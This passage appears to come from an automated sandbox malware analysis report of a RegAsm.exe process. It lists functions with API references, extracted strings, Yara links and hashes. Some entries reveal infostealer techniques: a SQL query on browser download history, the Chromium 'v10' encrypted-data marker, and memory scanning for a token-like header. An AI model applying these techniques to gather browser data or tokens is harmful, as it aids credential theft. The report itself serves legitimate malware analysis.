
Uniqueness Score: -1.00%

Function 0041C2D7 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041C2E5

Part of subcall function 0041ACC3: __mtinitlocknum.LIBCMT ref: 0041ACD9
Part of subcall function 0041ACC3: __amsg_exit.LIBCMT ref: 0041ACE5
Part of subcall function 0041ACC3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822,?,?,0041992B,00000000,0042E920,00419972,0040FCB0), ref: 0041ACED

DecodePointer.KERNEL32(0042E8A8,00000020,0041C428,00000000,00000001,00000000,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D), ref: 0041C321
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C332

Part of subcall function 0041B8AA: EncodePointer.KERNEL32(00000000,0041F47C,00642400,00000314,00000000,?,?,?,?,?,0041C63F,00642400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B8AC

DecodePointer.KERNEL32(-00000004,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C358
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C36B
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C375

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
Instruction ID: e2b3956bf5e94b2baf730586d1c238e8b3fbb8ba7e12c12fc2e7ba7e24f6204d
Opcode Fuzzy Hash: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
Instruction Fuzzy Hash: 4531293094031ADFDF10AFA5DC846EDBBB2BF49314F64802BE524A6250DBBC58919F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0B0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B0BC

Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24

__amsg_exit.LIBCMT ref: 0041B0DC
__lock.LIBCMT ref: 0041B0EC
InterlockedDecrement.KERNEL32(?), ref: 0041B109
_free.LIBCMT ref: 0041B11C
InterlockedIncrement.KERNEL32(004301C0), ref: 0041B134

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
Instruction ID: 1427177a95c760848ccbda204b7d26ea2269305e609c9ae0dd80fe0dd36cfa04
Opcode Fuzzy Hash: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
Instruction Fuzzy Hash: 5F01C431A01611ABDB20AB6598157EE7760FF08764F11411BE45063390C73C9EC2CFDE

Uniqueness

Uniqueness Score: -1.00%

Function 1C37BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

NEAR, xrefs: 1C37C03A
fts5 expression tree is too large (maximum depth %d), xrefs: 1C37C070
phrase, xrefs: 1C37C035, 1C37C042
fts5: %s queries are not supported (detail!=full), xrefs: 1C37C043

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: b6eda54f0d9a0952987c2e773cb477c2a74d3d76be3a84dd789786a4be1623af
Instruction ID: 93a14ab14d4afe59843bc16b013b751eead749bd9e483237a19bf82121ca7947
Opcode Fuzzy Hash: b6eda54f0d9a0952987c2e773cb477c2a74d3d76be3a84dd789786a4be1623af
Instruction Fuzzy Hash: AA4101316053029FD718CE24E880BAAB3A4FF85628F11476DE94147610E77AE889CFF1

Uniqueness

Uniqueness Score: -1.00%

Function 1C29F490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C29F4B0
misuse, xrefs: 1C29F4BA
%s at line %d of [%.10s], xrefs: 1C29F4BF
unable to delete/modify collation sequence due to active statements, xrefs: 1C29F533

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: 7312ac06aa5c7ed0aeb432add5e4495b850bc26accc332448d00f5bace11afa1
Instruction ID: ca3d4a6521d37c4fc85b61450249b10076560e7c0d0e96db49b2d5547128ece2
Opcode Fuzzy Hash: 7312ac06aa5c7ed0aeb432add5e4495b850bc26accc332448d00f5bace11afa1
Instruction Fuzzy Hash: 814125726053529BD700CF28EC80FAEB7E4EF81329F24456EF5549B282E376E5198B71

Uniqueness

Uniqueness Score: -1.00%

Function 00417620 Relevance: 8.9, APIs: 7, Instructions: 123stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000104,015720C0), ref: 00417697

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 004176BE
lstrcat.KERNEL32(?,?), ref: 004176DE
lstrcat.KERNEL32(?,?), ref: 004176F2
lstrcat.KERNEL32(?,015644A8), ref: 00417705
lstrcat.KERNEL32(?,?), ref: 00417719
lstrcat.KERNEL32(?,01571A58), ref: 0041772D

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 004173C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
Part of subcall function 004173C0: HeapAlloc.KERNEL32(00000000), ref: 004173F5
Part of subcall function 004173C0: wsprintfA.USER32 ref: 0041740E
Part of subcall function 004173C0: FindFirstFileA.KERNEL32(?,?), ref: 00417425

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
Instruction ID: 9e94d96a6c2fa7cf23f7c992aa699a2e18ad3ccda8d2e94c686f4496ebe02aa9
Opcode Fuzzy Hash: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
Instruction Fuzzy Hash: 08419AB5900219ABCB10EBA1CC46FDD7778AB0D704F40459EF715A3191DB78A788CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA

Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B

std::_Xinvalid_argument.LIBCPMT ref: 0040F7F7

Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC28
Part of subcall function 0041FC13: __CxxThrowException@8.LIBCMT ref: 0041FC3D
Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC4E

memcpy.MSVCRT ref: 0040F858

Strings

string too long, xrefs: 0040F7F2
invalid string position, xrefs: 0040F7B5

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
String ID: invalid string position$string too long
API String ID: 85833692-4289949731
Opcode ID: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
Instruction ID: fd4a6935f257f4bdd60dc841e67110243277f01f0b010555ef6c2c1b1382e91b
Opcode Fuzzy Hash: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
Instruction Fuzzy Hash: 9F31F4333002149BD730AE5CE880BAAF399EBA1764B24093FF141DB6C1D775DC4983A9

Uniqueness

Uniqueness Score: -1.00%

Function 1C261C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C261D3C
misuse, xrefs: 1C261D46
%s at line %d of [%.10s], xrefs: 1C261D4B
unknown database: %s, xrefs: 1C261CBD

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: 554ea930ac83b1a8d734219787adf59e2441ecd03408109991d0539f9fb836db
Instruction ID: 13884e5dd66af9a6745fb45b7e7f91e918386bcb8d785ef7f28608da5c15b1de
Opcode Fuzzy Hash: 554ea930ac83b1a8d734219787adf59e2441ecd03408109991d0539f9fb836db
Instruction Fuzzy Hash: 232127B95017616BE7209E69DC44FDB76A99FC2318F30012CFC5566681D731B584C773

Uniqueness

Uniqueness Score: -1.00%

Function 1C293FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C29407D, 1C2940A8
%s at line %d of [%.10s], xrefs: 1C29408C, 1C2940B7
database corruption, xrefs: 1C294087, 1C2940B2

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: d98a3ccfef71aec692f467d18f9d8b85759074a6d328110d124c7dfea53d06c1
Instruction ID: 10d7ccbf37ec1a5f728a432d56a5da38b6aed6ef7e419e78cef1c19efa8df14b
Opcode Fuzzy Hash: d98a3ccfef71aec692f467d18f9d8b85759074a6d328110d124c7dfea53d06c1
Instruction Fuzzy Hash: 812125B7A053225BC710DE0CDC41AEBBBE0EB84611F424026FD44D7301E725DA5987F2

Uniqueness

Uniqueness Score: -1.00%

Function 1C405BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,32658899,?,?,00000000,1C45D1CB,000000FF,?,1C405B30,?,?,1C405ADF,?), ref: 1C405BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1C405C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,1C45D1CB,000000FF,?,1C405B30,?,?,1C405ADF,?), ref: 1C405C2A

Strings

mscoree.dll, xrefs: 1C405BEF
CorExitProcess, xrefs: 1C405C00

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: af489fed8d76f31b0757e6764c2a32b79d293c426059f216c72c03c7354623b7
Instruction ID: 422e26d8fcfb3209a847edaf3518b22f0bc9330d6cf36db369e8798439d49645
Opcode Fuzzy Hash: af489fed8d76f31b0757e6764c2a32b79d293c426059f216c72c03c7354623b7
Instruction Fuzzy Hash: 49016271A5C639EFDB158F90CD45FEEBBB8FB08715F010925E811A2290DB78D910CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408400 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 302stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000), ref: 004086F8
lstrlen.KERNEL32(00000000), ref: 0040870C

Strings

Downloads, xrefs: 00408444
SELECT target_path, tab_url from downloads, xrefs: 004085B7
Downloads, xrefs: 004084C8

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 1951da29600124bb4dbb00d7bb5c50788118c9651fbd28057b8f380e682d4767
Instruction ID: 54a70b35f2e3bd0bead06bd516102e4005ef58b22266876870fc93898b796347
Opcode Fuzzy Hash: 1951da29600124bb4dbb00d7bb5c50788118c9651fbd28057b8f380e682d4767
Instruction Fuzzy Hash: 8FC16F71805248EACB05EBA5D951BDDBBB86F19308F1441AEF506B3282DF785B0CC779

Uniqueness

Uniqueness Score: -1.00%

Function 0040F240 Relevance: 7.7, APIs: 5, Instructions: 165stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040F255
??_U@YAPAXI@Z.MSVCRT ref: 0040F282

Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F07D
Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F097
Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F152

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FC51,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F2CE
VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F3B4
??_V@YAXPAX@Z.MSVCRT ref: 0040F3C3

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtual
String ID:
API String ID: 3099930812-0
Opcode ID: bbaf4bed5d45758465003f13e5ae66ad91c3c2937bed8bbd77f23696a9a0677a
Instruction ID: 067aa555f17516b8096591eac6b752a234b9d284ae0b983da437ecac591d64d5
Opcode Fuzzy Hash: bbaf4bed5d45758465003f13e5ae66ad91c3c2937bed8bbd77f23696a9a0677a
Instruction Fuzzy Hash: 25519175A00118ABEB24DE69DD41ABFB3FAEB88714F14413AFD05E7380E638DD0187A5

Uniqueness

Uniqueness Score: -1.00%

Function 004070D0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040710B
memset.MSVCRT ref: 00407139
LocalAlloc.KERNEL32(00000040,?), ref: 00407170

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Strings

v10, xrefs: 00407105
@, xrefs: 00407151

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
Instruction ID: 1ad0ea3c5568345b5ddcad74f610c07972afb0beca4ce7e104c85093a37f4707
Opcode Fuzzy Hash: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
